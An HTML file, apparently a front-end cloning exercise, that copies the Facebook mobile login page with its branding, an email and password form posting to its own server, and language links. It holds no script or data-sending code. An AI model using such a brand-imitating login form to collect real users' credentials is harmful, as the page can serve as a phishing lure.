<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=Edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="preconnect" href="https://fonts.gstatic.com">
    <link href="https://fonts.googleapis.com/css2?family=Roboto&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css" integrity="sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ" crossorigin="anonymous">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <title>HTML</title>
    <!-- HTML -->
    <!-- Custom Styles -->
    <link rel="stylesheet" href="/css/style.css">
</head>

<body>
    <!-- header section -->
    <header class="header">
        <div class="get-facebook">
            <img src="img/fbandroid.png" alt="fbandroid" />
            <p>Get Facebook for Android and browse faster.</p>
        </div>
        <div class="facebook">
            <h1>facebook</h1>
        </div>
    </header>
    <!-- main section -->
    <div class="main">
        <!-- form -->
        <form class="form" action="/" method="post" accept-charset="utf-8">
            <input class="input" type="text" name="email" id="email" placeholder="Mobile number or email address" />
            <input class="input" type="password" name="pass" id="pass" placeholder="Password" />
            <button type="submit" class="form-submit">log in</button>
        </form>
        <!-- span -->
        <span class="span">or</span>
        <!-- create new account button -->
        <input class="create-button" type="submit" id="create-button" value="Create New Account" />
        <p class="f-password">Forgot Password?</p>
    </div>
    <!-- others -->
    <div class="others">
        <div class="section">
            <a href="#" class="language" id="currentlang">English (UK)</a>
            <a href="#" class="language">മലയാളം</a>
            <a href="#" class="language">தமிழ்</a>
            <a href="#" class="language">ಕನ್ನಡ</a>
            <a href="#" class="language">हिन्दी</a>
            <a href="#" class="language">اردو</a>
        </div>
        <div class="section">
            <a href="#" class="language">বাংলা</a>
            <a href="#" class="language">తెలుగు </a>
            <a href="#" class="language">Español</a>
            <a href="#" class="language">Português (Brasil)</a>
            <a href="#" class="language">Français (France)</a>
            <a href="#" id="morelang"><i class="fa fa-plus" aria-hidden="true"></i></a>
        </div>
    </div>
    <!-- facebook inc -->
    <p class="facebook-inc">Facebook Inc.</p>
    
    <!-- Project -->
    <!-- <script src="/js/main.js"></script> -->
</body>

</html>